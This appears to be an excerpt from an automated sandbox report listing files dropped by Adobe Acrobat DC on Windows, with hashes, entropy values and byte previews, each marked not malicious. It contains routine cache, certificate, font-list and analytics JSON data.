                                                                      Size (bytes):324
                                                                      Entropy (8bit):5.231836495917372
                                                                      Encrypted:false
                                                                      SSDEEP:6:77nLoMq2Pwkn2nKuAl9OmbzNMxIFUt8O7nLtRXZmw+O7nLtRFkwOwkn2nKuAl9Ob:7/oMvYfHAa8jFUt8O/tRX/+O/tRF5Jfv
                                                                      MD5:FBDEFADD19363353A1B10D0E5575B432
                                                                      SHA1:D175872BC711A72C88705BD7923D725224467A52
                                                                      SHA-256:002E7464A1C4870AC1B94ED8297D1EEBEF5F4E126111FD442F9F62BB66895458
                                                                      SHA-512:A357B8B24C5E9DD616CC18E22FB9A513848F898B8A0133B439E8BF41BA21B0DAE0D493FBA1DAAFAA84E78B908E7AC9932DDEB5432F319BAD9E8833C0BEF8E9AD
                                                                      Malicious:false
                                                                      Preview:2024/12/15-19:33:06.736 1e74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/15-19:33:06.737 1e74 Recovering log #3.2024/12/15-19:33:06.737 1e74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                      Category:dropped
                                                                      Size (bytes):86016
                                                                      Entropy (8bit):4.445280752952866
                                                                      Encrypted:false
                                                                      SSDEEP:384:yezci5tuiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:rBs3OazzU89UTTgUL
                                                                      MD5:22490206BA3586845BB72B90E2D8EDE6
                                                                      SHA1:2FCA1A167EB95B6FA89122271B7CE473CBF51283
                                                                      SHA-256:141820C298D4D0E02DD3B1E35FB765976EE8DCBC972485675AFCC861B8304147
                                                                      SHA-512:5CCE9275AAD9B504FC5558D5517404695710A80CFD01F94F7C22FC41B261DDC90F166E21EE69A65CF107D84EF7A5981AAD0602E073D5C391CC77BB7E907F982E
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):3.7766721316090828
                                                                      Encrypted:false
                                                                      SSDEEP:48:7Mep/E2ioyVRioy9oWoy1Cwoy1hKOioy1noy1AYoy1Wioy1hioybioyJoy1noy1w:7FpjuRF8XKQIub9IVXEBodRBkL
                                                                      MD5:260B79B1434A336495299F6622A2828D
                                                                      SHA1:423DCD30126FC78D66E56E07764D9D88E4FC99FD
                                                                      SHA-256:A73CC64A4A1A7302D601CAB9BA45EB0659B014A6EEAA7DD55D80DD04D661F0FE
                                                                      SHA-512:BADEB30F8566D5114615895D5F19082E86D2C5854FF107AF03E3568F9B115A1EC5973619AC71CFAEDEA52DAF402520BE543CEACE0827781A65EF6B0F3B89291E
                                                                      Malicious:false
                                                                      Preview:.... .c.......-`...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Certificate, Version=3
                                                                      Category:dropped
                                                                      Size (bytes):1391
                                                                      Entropy (8bit):7.705940075877404
                                                                      Encrypted:false
                                                                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                      Malicious:false
                                                                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                      Category:dropped
                                                                      Size (bytes):71954
                                                                      Entropy (8bit):7.996617769952133
                                                                      Encrypted:true
                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                      Malicious:false
                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):192
                                                                      Entropy (8bit):2.7673182398396405
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFklM5pvfllXlE/HT8koclh1NNX8RolJuRdxLlGB9lQRYwpDdt:kKV5pQT8Gz7NMa8RdWBwRd
                                                                      MD5:EB4CF9D5BA518FF750C9993D89140AB9
                                                                      SHA1:4CEF94FBE03CA3EA9455BD5EFD85D4882D9CF039
                                                                      SHA-256:55EDFC4E9F696E8C45DCDE7119B62B8618BCA5B7A27F411DE4766EFF44C991C6
                                                                      SHA-512:CD93874D2BB1DF8923F5309D19A5053EF6086B4408E1F0506DDAEB27F48A5011D1981B4007413E74204BBEFFCE4B28965545D912CF5EE7400CE90D55778CD424
                                                                      Malicious:false
                                                                      Preview:p...... .........[Y.RO..(....................................................... ..........W.....Q..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.1382935058119616
                                                                      Encrypted:false
                                                                      SSDEEP:6:kK2sD9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:TaDnLNkPlE99SNxAhUe/3
                                                                      MD5:BA99880278A26A19D6B7033C34DF68A0
                                                                      SHA1:5AB0FE8CCF5428BDAECACD5F8D724664414C56EE
                                                                      SHA-256:00BA7334024D66F53BE1B772E2719E1D16CD53675F8824447ACCC8A03FE2B14C
                                                                      SHA-512:D5309420E4FE3BA383CDFC61256E6683C7E814F9451E0FB0FCDFC07C47F8470DADB689D7B75092995226C3B840A6D45359D509C4B4541E65DEF5AFC41E8757DC
                                                                      Malicious:false
                                                                      Preview:p...... ........{sf,RO..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):1233
                                                                      Entropy (8bit):5.233980037532449
                                                                      Encrypted:false
                                                                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):10880
                                                                      Entropy (8bit):5.214360287289079
                                                                      Encrypted:false
                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:PostScript document text
                                                                      Category:dropped
                                                                      Size (bytes):10880
                                                                      Entropy (8bit):5.214360287289079
                                                                      Encrypted:false
                                                                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                      MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                      Malicious:false
                                                                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
                                                                      Entropy (8bit):5.347949571956656
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJM3g98kUwPeUkwRe9:YvXKXod2Zc0vkiGMbLUkee9
                                                                      MD5:239852843911E4DE043360F828684880
                                                                      SHA1:D5DC71104BDAB1383F1596A0557B4C6C534081E1
                                                                      SHA-256:EDC57E19918E1C8872A4713BEFD04D3637815CF0649CD4A00E4F5C9FC835E092
                                                                      SHA-512:24C9E9457712E40CAE715B2ACB74A2D512BA61307D7174FE96C2009480ADC70C23C54875F412B92C4353F8A27208EAEDD43CAC0875BA2C2C0E1D964126F2900D
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.2980357492673
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfBoTfXpnrPeUkwRe9:YvXKXod2Zc0vkiGWTfXcUkee9
                                                                      MD5:FEF053330C7893328EEE956D9BE5A1BC
                                                                      SHA1:D57F01FB32DE1F9D492A43A7016BE76E66A26AAF
                                                                      SHA-256:6B804FBA43B26E0C2094E154C561F2DD2695737950A195D95E76824096F67C0D
                                                                      SHA-512:76FF9A8F5A56F12CAC44CAE9771D275C184D729B19756C2BC913A0E9708D6F6B9713FFD12347D6730EF1E0D8987A7BEE458336884D5FAFDC749F2AC8D12B6812
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):294
                                                                      Entropy (8bit):5.276741963494178
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfBD2G6UpnrPeUkwRe9:YvXKXod2Zc0vkiGR22cUkee9
                                                                      MD5:8B5D3672B14426EFEDEE7BA169137623
                                                                      SHA1:F4DF697D505050265371606FF310E6A19D0E7474
                                                                      SHA-256:CE047136648D35884D72C2C56AF295C2A63ECD05E8116A0F3906405A0EBEE839
                                                                      SHA-512:6B7EE36EB2D4180DFD5E8ED0753544D9F2236A6706AD65C209951F8EA5D37569CC03504FF7B3AEAC16D6D9ED74F7DCE587BCE41AD31B0ACD78CF30D652BB8D6F
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):285
                                                                      Entropy (8bit):5.334419242560217
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfPmwrPeUkwRe9:YvXKXod2Zc0vkiGH56Ukee9
                                                                      MD5:F049840D8A1CDA25458A71DFB671F2B3
                                                                      SHA1:99B752AB7661FF03B3EC63D1E6E0630B70A5AC59
                                                                      SHA-256:575605381A9FA4262F5FAB5F6CB542DD2BEC8E7B8857C3B2B15958914C8AFA67
                                                                      SHA-512:9C96246C2E550821246EA598B05EB0F280A9D5393110C3BB4A74EF23123576E27BA697E8E1F75BE16B413CD1D42A9AAEDAFACE53B598BF09B3042452FBDE5A56
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):1123
                                                                      Entropy (8bit):5.690264896322464
                                                                      Encrypted:false
                                                                      SSDEEP:24:Yv6Xg2zv+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSK:YvLuWhgy6SAFv5Ah8cv/K
                                                                      MD5:83CFB3EC88A1763E4A2158BB07FA13E8
                                                                      SHA1:7D273C625F2A8A4ED419FD0CD06EBA13BF2D652B
                                                                      SHA-256:8D76950C18EC716AF31EC68787044C929642755E46D4B72E48675F9F17D4E2B7
                                                                      SHA-512:069764461F428969D4D848B76C3A6DE4771F0CA9D3DE8926E4B6B901160E0D1CABC22B77358AE99DB09AE01D436F936F321A587EA452ADA47F584EDF788307CD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.282544929850892
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJf8dPeUkwRe9:YvXKXod2Zc0vkiGU8Ukee9
                                                                      MD5:FAB922A40E762B75FBD88AC824E9644A
                                                                      SHA1:6AFF6BB822027D5AE2C46C4D61499D0E09C6AD3D
                                                                      SHA-256:15CC68687B04BCFAD7F34700636A8228EB030E9F2422721FE9527ACD4B8A0575
                                                                      SHA-512:481E4775B9D70DFC4F10C8EB390678F316DA9E9A2803B753222421EB1C23E37E8C6373831BF59A5EAE1EBEDB1BB383A9C7BD0AA09EB937AE9806EE39CEDE870D
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):292
                                                                      Entropy (8bit):5.28720649717847
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfQ1rPeUkwRe9:YvXKXod2Zc0vkiGY16Ukee9
                                                                      MD5:66AC91968AB3A68E7E6CA1E9A6BBBE47
                                                                      SHA1:70DFF9F5177312ADCEE3158C908D89687D1E2617
                                                                      SHA-256:8D838CA1719860BF57F7142197368FD6A74A67AF8A92DB13E8C450730C4A7444
                                                                      SHA-512:E712BFEC5114368EE461495960719838A58EA62631246160A7B17108259E5EACB4674D0D70A6394939B2ED097C788EB0FE7302FD2D3AC9A2D1B6C6CA0468530F
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):289
                                                                      Entropy (8bit):5.292353145864045
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HXkDdP99VoZcg1vRcR0YneeoAvJfFldPeUkwRe9:YvXKXod2Zc0vkiGz8Ukee9
                                                                      MD5:68DEC50CAB108C941BAD637B33B6E7B7
                                                                      SHA1:6FE8EB878A6AADEE2D6E0DE97BF44F6D5780A1C2
                                                                      SHA-256:AD98EDBC7DBE50EB04C81DA298C0222769B9F2E9CED388F2C5798DA384E6D0D4
                                                                      SHA-512:4C4402E01983D1404704621A0E554E0A930B149FBC250FCEBC4FFAAFEF03AC147DF2AC02374E23E128FC5086659DEAB55CA39FC34B41D45CD378DC627B461D95
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"315f5a64-4aba-4537-9f74-1d04c7e79959","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1734487186780,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):295
                                                                      Entropy (8bit):5.307945230718025
                                                                      Encrypted:false
